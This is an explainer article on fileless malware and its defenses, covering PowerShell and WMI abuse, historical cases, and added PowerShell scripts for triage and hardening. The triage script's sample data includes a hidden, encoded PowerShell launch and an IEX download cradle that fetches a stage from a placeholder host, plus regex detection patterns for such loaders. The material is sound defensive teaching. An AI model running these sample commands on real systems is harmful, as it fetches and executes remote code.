Fileless Malware Meaning & Definition

Fileless malware is a type of malicious software that uses legitimate applications already installed on a computer to carry out an infection. It doesn’t rely on dropping its own executable files and leaves far fewer traces on disk, since the malicious code runs from memory rather than from a file. Fileless malware doesn’t require code to be installed, but an attacker still needs to gain initial access to the environment in order to abuse the native tools already present in the operating system, such as scripting engines and management utilities. This technique of using native tools to conduct a malicious attack is known as “living off the land.”

Common characteristics of a fileless malware attack include:

  • Leverages approved applications that are already within the system
  • Leaves little or no malicious code on disk for signature-based scanners to find
  • Has no single identifying file or hash, so detection has to rely on behavior rather than signatures
  • Is memory-based: it lives in the system’s memory
  • Uses processes that are built into the operating system
  • Is often paired with other types of malware, such as a document macro or exploit that launches it
  • Can remain in an environment despite application whitelisting and sandboxing efforts, because the tools it abuses are already trusted and allowed

Well known fileless malware attacks include:

  • SQL Slammer: A 2003 worm that exploited a buffer overflow in Microsoft SQL Server 2000 and MSDE 2000 with a single UDP packet, ran entirely in the memory of the SQL Server process, and caused a Denial of Service (DoS) on internet hosts that dramatically slowed general internet traffic.
  • Stuxnet: First uncovered in 2010 but thought to be in development since 2005, a worm designed to sabotage the industrial control systems used in uranium enrichment. Stuxnet is believed to be responsible for causing damage to the nuclear program of Iran. It is usually cited here for its in-memory injection into trusted processes, although it also wrote driver and DLL files to disk.
  • UIWIX: A ransomware threat discovered in 2017 that exploited the same SMBv1 vulnerability (MS17-010, the EternalBlue exploit) as the WannaCry ransomware attack, but ran in memory rather than dropping files to disk.

How fileless malware works

Fileless malware attacks abuse legitimate tools already installed on a computer to infiltrate, take control, and carry out the attack, rather than installing or downloading an executable of their own. The initial foothold still needs a way in: an exploit of a vulnerable application, a document macro, or a user-initiated action such as clicking a malicious advertisement that redirects to a page exploiting a browser plugin like Flash. From there the attack chains into other applications already on the device.

Once running in the computer’s RAM, the malware injects its code into a legitimate process and drives native Windows tools, such as PowerShell and Windows Management Instrumentation (WMI), to fetch further stages, move laterally, and persist. These tools are targeted because they are signed by Microsoft, present on every Windows host, and used daily by administrators to manage many endpoints, so their activity blends in with normal operations.

The payload exists only in the computer’s RAM, meaning no malicious executable is written to the hard drive. A reboot clears it, so the attacker has a smaller window of opportunity unless persistence is added, but it is also more difficult to detect because there is no stored file for signature-based security software to scan. In practice many fileless attacks do leave small traces, for example an encoded script stored in a registry value or a WMI event subscription that relaunches the payload at startup, which is why those locations are worth auditing.
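The following PowerShell is an added example written for this article and is not code from the original page. It scores process-creation and script-block records for the living-off-the-land patterns just described: an Office application spawning PowerShell, hidden-window and encoded-command flags, download cradles that run a stage in memory, and references to WMI subscription classes. The indicator lists, the Alert/Review/Benign thresholds, the function names and the sample events are all this example’s own constructions; the Get-LiveScriptBlockEvents helper reads real Event ID 4104 records once script block logging is enabled.

```powershell
# Added example (not code from the original article): triage the PowerShell
# and WMI activity described above. Indicator lists, thresholds and the sample
# telemetry below are constructed for illustration; tune them to your environment.

# Text patterns typical of loaders that fetch and run a stage entirely in memory.
$ScriptBlockIndicators = @(
    @{ Name = 'DownloadCradle'; Pattern = 'DownloadString|DownloadFile|Invoke-WebRequest|Net\.WebClient' }
    @{ Name = 'InMemoryExec';   Pattern = 'Invoke-Expression|\bIEX\b|\[Reflection\.Assembly\]::Load|\[System\.Reflection\.Assembly\]::Load' }
    @{ Name = 'EncodedPayload'; Pattern = 'FromBase64String|-EncodedCommand|\s-e(nc|c)?\s' }
    @{ Name = 'EvasionFlags';   Pattern = '-NoProfile|-nop\b|-WindowStyle\s+Hidden|-w\s+hidden|-ExecutionPolicy\s+Bypass' }
    @{ Name = 'WmiPersistence'; Pattern = '__EventFilter|CommandLineEventConsumer|ActiveScriptEventConsumer|__FilterToConsumerBinding' }
)

# Programs that should almost never spawn a scripting host on a workstation.
$SuspiciousParents = 'winword.exe', 'excel.exe', 'powerpnt.exe', 'outlook.exe', 'mshta.exe', 'wscript.exe', 'cscript.exe'
$ScriptingHosts    = 'powershell.exe', 'pwsh.exe', 'wmic.exe', 'wscript.exe', 'cscript.exe', 'mshta.exe'

function Get-ImageName {
    param([string]$Path)
    # Split on either slash so the helper also works when run on non-Windows pwsh.
    return (($Path -split '[\\/]')[-1]).ToLowerInvariant()
}

function Get-ScriptBlockIndicators {
    param([string]$Text = '')
    # Case-insensitive -match; returns the names of every indicator family that fires.
    $hits = @(foreach ($i in $ScriptBlockIndicators) { if ($Text -match $i.Pattern) { $i.Name } })
    return $hits
}

function Test-SuspiciousLineage {
    param([string]$ParentImage, [string]$Image)
    return ((Get-ImageName $Image) -in $ScriptingHosts) -and ((Get-ImageName $ParentImage) -in $SuspiciousParents)
}

function Invoke-FilelessTriage {
    param([Parameter(Mandatory)][object[]]$Events)
    foreach ($e in $Events) {
        $reasons = @()
        if ($e.Type -eq 'ProcessCreate') {
            if (Test-SuspiciousLineage $e.ParentImage $e.Image) {
                $reasons += 'parent=' + (Get-ImageName $e.ParentImage)
            }
            $reasons += @(Get-ScriptBlockIndicators $e.CommandLine)
            $detail = $e.CommandLine
        } else {
            $reasons += @(Get-ScriptBlockIndicators $e.ScriptBlockText)
            $detail = $e.ScriptBlockText
        }
        # Heuristic severity: two independent indicators is enough to page someone.
        $verdict = if ($reasons.Count -ge 2) { 'Alert' } elseif ($reasons.Count -eq 1) { 'Review' } else { 'Benign' }
        [pscustomobject]@{ Type = $e.Type; Verdict = $verdict; Reasons = ($reasons -join ','); Detail = $detail }
    }
}

# Pull real script-block text (Event ID 4104) once script block logging is enabled.
function Get-LiveScriptBlockEvents {
    param([int]$MaxEvents = 200)
    Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104 } -MaxEvents $MaxEvents |
        ForEach-Object { [pscustomobject]@{ Type = 'ScriptBlock'; ScriptBlockText = $_.Properties[2].Value } }
}

# Constructed sample telemetry shaped like Sysmon Event ID 1 and PowerShell 4104 fields.
$SampleEvents = @(
    [pscustomobject]@{ Type = 'ProcessCreate'; ParentImage = 'C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE'
                       Image = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
                       CommandLine = 'powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA' }
    [pscustomobject]@{ Type = 'ScriptBlock'; ScriptBlockText = 'IEX (New-Object Net.WebClient).DownloadString(''http://example.invalid/stage2.ps1'')' }
    [pscustomobject]@{ Type = 'ProcessCreate'; ParentImage = 'C:\Windows\explorer.exe'
                       Image = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
                       CommandLine = 'powershell.exe -File C:\Scripts\nightly-backup.ps1' }
    [pscustomobject]@{ Type = 'ScriptBlock'; ScriptBlockText = 'Get-ChildItem C:\Logs | Where-Object Length -gt 1MB' }
)

Invoke-FilelessTriage -Events $SampleEvents | Format-Table -AutoSize
```

On the constructed sample the Word-spawned, hidden, encoded PowerShell launch and the download cradle come back as Alert, while the scheduled backup script and the log listing come back as Benign. To run it against a real host, replace `$SampleEvents` with the output of `Get-LiveScriptBlockEvents` and with process-creation records from Sysmon or Event ID 4688 with command-line auditing enabled; the point of the lineage check is that the same powershell.exe binary is benign under explorer.exe and suspicious under winword.exe.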

How to prevent fileless malware

While fileless malware attacks are difficult to detect, it is not impossible, and they do leave traces of evidence behind: in-memory artifacts, PowerShell and WMI activity logs, and process lineage. Endpoint detection tools flag, for example, an Office application or browser spawning PowerShell, PowerShell launched with hidden-window or encoded-command flags, or an unexpected WMI event subscription. To minimize risk, consider using these approaches:

  • Restrict PowerShell and WMI if they are not in use. PowerShell can be limited with application control (AppLocker or WDAC) and its activity recorded with script block and module logging; WMI cannot simply be switched off because Windows itself depends on it, so audit its permanent event subscriptions instead
  • Disable macros if not in use, or allow only digitally signed macros
  • Regularly check security logs for inordinate amounts of data leaving the network
  • Secure system endpoints with up-to-date endpoint detection and response (EDR) tooling
  • Look for changes in the system’s behavioral patterns, such as unusual parent-child process relationships
  • Update software regularly, and remove the legacy PowerShell 2.0 engine, which lacks script block logging
  • If an attack has occurred, rotate credentials, since in-memory tooling is commonly used to harvest passwords
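The following PowerShell is an added example for this article, not code from the original page, that audits and applies the host-level controls in the list above. The registry paths for script block logging, module logging and Office macro policy are the standard Windows policy locations, and MicrosoftWindowsPowerShellV2Root is the real optional-feature name; the function names, the Office 16.0 version assumption and the choice to set macros to signed-only are this example’s own. Run it from an elevated prompt.

```powershell
# Added example (not code from the original article): audit and tighten the
# controls listed above. Registry paths are standard Windows policy locations;
# function names and the Office 16.0 assumption are this example's own.

$SblKey = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging'
$MlKey  = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ModuleLogging'

function Get-RegValue {
    param([string]$Path, [string]$Name)
    # Returns $null when the key or value does not exist instead of throwing.
    $item = Get-ItemProperty -Path $Path -Name $Name -ErrorAction SilentlyContinue
    if ($null -ne $item) { return $item.$Name }
}

function Get-WmiPersistence {
    # Permanent WMI event subscriptions survive reboots with no executable on disk,
    # which makes root\subscription a standard place to look for fileless persistence.
    $ns = 'root\subscription'
    $filters   = Get-CimInstance -Namespace $ns -ClassName __EventFilter -ErrorAction SilentlyContinue
    $consumers = Get-CimInstance -Namespace $ns -ClassName CommandLineEventConsumer -ErrorAction SilentlyContinue
    $consumers += Get-CimInstance -Namespace $ns -ClassName ActiveScriptEventConsumer -ErrorAction SilentlyContinue
    $bindings  = Get-CimInstance -Namespace $ns -ClassName __FilterToConsumerBinding -ErrorAction SilentlyContinue
    foreach ($f in $filters)  { [pscustomobject]@{ Kind = 'Filter';   Name = $f.Name; Detail = $f.Query } }
    foreach ($c in $consumers) {
        # CommandLineEventConsumer carries CommandLineTemplate; ActiveScriptEventConsumer carries ScriptText.
        $detail = if ($c.CommandLineTemplate) { $c.CommandLineTemplate } else { $c.ScriptText }
        [pscustomobject]@{ Kind = 'Consumer'; Name = $c.Name; Detail = $detail }
    }
    foreach ($b in $bindings) { [pscustomobject]@{ Kind = 'Binding';  Name = "$($b.Filter)"; Detail = "$($b.Consumer)" } }
}

function Get-FilelessDefenseStatus {
    # Office macro policy values: 1 enable all, 2 notify, 3 signed only, 4 disable all.
    [pscustomobject]@{
        ScriptBlockLogging = (Get-RegValue $SblKey 'EnableScriptBlockLogging') -eq 1
        ModuleLogging      = (Get-RegValue $MlKey 'EnableModuleLogging') -eq 1
        PowerShellV2       = (Get-WindowsOptionalFeature -Online -FeatureName MicrosoftWindowsPowerShellV2Root -ErrorAction SilentlyContinue).State
        LanguageMode       = $ExecutionContext.SessionState.LanguageMode
        WordMacroPolicy    = Get-RegValue 'HKCU:\Software\Policies\Microsoft\Office\16.0\Word\Security' 'VBAWarnings'
        ExcelMacroPolicy   = Get-RegValue 'HKCU:\Software\Policies\Microsoft\Office\16.0\Excel\Security' 'VBAWarnings'
        WmiSubscriptions   = @(Get-WmiPersistence).Count
    }
}

function Enable-FilelessDefenses {
    [CmdletBinding(SupportsShouldProcess)]
    param()
    if ($PSCmdlet.ShouldProcess($SblKey, 'enable script block logging')) {
        New-Item -Path $SblKey -Force | Out-Null
        Set-ItemProperty -Path $SblKey -Name EnableScriptBlockLogging -Value 1 -Type DWord
    }
    if ($PSCmdlet.ShouldProcess($MlKey, 'enable module logging for all modules')) {
        New-Item -Path "$MlKey\ModuleNames" -Force | Out-Null
        Set-ItemProperty -Path $MlKey -Name EnableModuleLogging -Value 1 -Type DWord
        Set-ItemProperty -Path "$MlKey\ModuleNames" -Name '*' -Value '*'
    }
    # The 2.0 engine has no script block logging; removing it closes the "-Version 2" downgrade.
    if ($PSCmdlet.ShouldProcess('Windows feature MicrosoftWindowsPowerShellV2Root', 'disable')) {
        Disable-WindowsOptionalFeature -Online -FeatureName MicrosoftWindowsPowerShellV2Root -NoRestart | Out-Null
    }
    # Allow only signed macros, and block macros in documents that came from the Internet.
    foreach ($app in 'Word', 'Excel', 'PowerPoint') {
        $key = "HKCU:\Software\Policies\Microsoft\Office\16.0\$app\Security"
        if ($PSCmdlet.ShouldProcess($key, 'restrict macros')) {
            New-Item -Path $key -Force | Out-Null
            Set-ItemProperty -Path $key -Name VBAWarnings -Value 3 -Type DWord
            Set-ItemProperty -Path $key -Name blockcontentexecutionfrominternet -Value 1 -Type DWord
        }
    }
}

Get-FilelessDefenseStatus
Get-WmiPersistence | Format-Table -AutoSize
# Enable-FilelessDefenses -WhatIf   # preview the changes; drop -WhatIf to apply them
```

Two caveats match the list above. “Disable WMI” is not really achievable, since Windows management and many EDR agents depend on it; the practical control is to review the filters, consumers and bindings this script lists and delete any rogue ones with Remove-CimInstance. Likewise, “disable PowerShell” is best done with AppLocker or WDAC rules scoped to the users who need it, which are policy objects rather than a registry flag and so are outside this script; turning on logging first means you can see who actually uses it before restricting it.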

Abby Dykes
Abby Dykes is a writer and editor for websites such as TechnologyAdvice.com, Webopedia.com, and Project-Management.com, where she covers technology trends and enterprise and SMB project management platforms. When she’s not writing about technology, she enjoys giving too many treats to her dog and coaching part-time at her local gym.
